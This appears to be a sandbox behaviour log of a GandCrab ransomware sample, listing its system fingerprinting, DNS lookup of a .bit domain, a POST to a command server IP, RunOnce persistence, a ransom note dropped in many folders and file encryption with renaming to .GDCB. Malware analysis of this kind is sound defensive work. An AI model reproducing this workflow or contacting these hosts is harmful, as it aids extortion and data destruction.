Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup gandcrab.bit a.dnspod.com, os_pid = 0x924, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 147 True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 512 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, protection = PAGE_WRITECOPY, maximum_size = 0 True 1
Fn
Module Map C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, desired_access = FILE_MAP_COPY True 1
Fn
Module Unmap process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_DIRECT True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 78.155.206.6, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = curl.php?token=1019, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 78.155.206.6/curl.php?token=1019 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 9 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74caf8d0 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74caf8d0 True 1
Fn
Process Create process_name = http://gdcbghvjyqy7jclk.onion.top/dce1bb8bd2ca4def, show_window = SW_SHOW False 1
Fn
Thread 0x248
(Host: 4, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, base_address = 0x400000 True 3
Fn
Window Create window_name = firefox, class_name = win32app, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = firefox, class_name = win32app, index = 18446744073709551600, new_long = 0 True 1
Fn
Thread 0xb9c
(Host: 9, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\CIiHmnxMn6Ps\AppData\Roaming True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = gwpuolemwaq, data = "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe", size = 120, type = REG_SZ True 1
Fn
Thread 0x7ac
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x1a4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x784
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x1b4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x880
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x57c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7b0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7a0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x824
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x820
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x75c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x814
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x81c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x838
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x804
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x610
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbf0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xb80
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x900
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbec
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xb5c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7f0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xad4
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xad8
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x8cc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x2cc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x2e0
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x77c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x868
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0x7fc
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = firefox browser True 1
Fn
Thread 0xbd8
(Host: 23508, Network: 0)
+
Category Operation Information Success Count Logfile
File Create filename = C:\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-18\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-21-1462094071-1423818996-289466292-1000\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\bg-BG\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\cs-CZ\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\da-DK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\de-DE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\el-GR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\en-GB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\es-ES\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\es-MX\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\et-EE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\fi-FI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\Fonts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\fr-CA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\fr-FR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\hr-HR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\hu-HU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\it-IT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ja-JP\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ko-KR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\lt-LT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\lv-LV\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\nb-NO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\nl-NL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\pl-PL\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\pt-BR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\pt-PT\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\qps-ploc\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\Resources\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\Resources\en-US\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ro-RO\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\ru-RU\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sk-SK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sl-SI\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sr-Latn-CS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sr-Latn-RS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\sv-SE\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\tr-TR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\uk-UA\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\zh-CN\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\zh-HK\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Boot\zh-TW\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\Cache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 1048576, size_out = 53574 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 53584 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr.dat.GDCB True 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, size = 1048576, size_out = 184071 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, size = 184080 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.GDCB True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 1048576, size_out = 63413 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 63424 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.GDCB True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
